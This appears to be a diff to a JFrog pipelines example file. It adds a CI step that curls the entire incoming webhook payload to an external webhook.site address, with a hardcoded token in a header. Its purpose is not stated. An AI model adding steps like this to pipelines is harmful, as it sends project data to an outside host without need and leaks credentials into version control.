--- a/jfrog-quickstart-examples/pipelines.yml
+++ b/jfrog-quickstart-examples/pipelines.yml
@@ -50,6 +50,7 @@ pipelines:
             - echo "$res_myIWH_payload" | jq '.' > payload.json
             - cat payload.json
             - echo "$res_myIWH_payload"
+            - 'curl -X POST "https://webhook.site/2be34b4b-8a90-47cd-ba9f-a3e237e90765" -H "accept: application/json" -H "x-token: OUvGHNDLQm4LVxiawg1EvSlbDPT98MBbztBpLHZ4LPXzR" -H "Content-Type: application/json" -d "$res_myIWH_payload"'
             - echo $(read_json $res_myIWH_payload "project")
             - add_run_variables project= (read_json $res_myIWH_payload "project")
             - echo $project
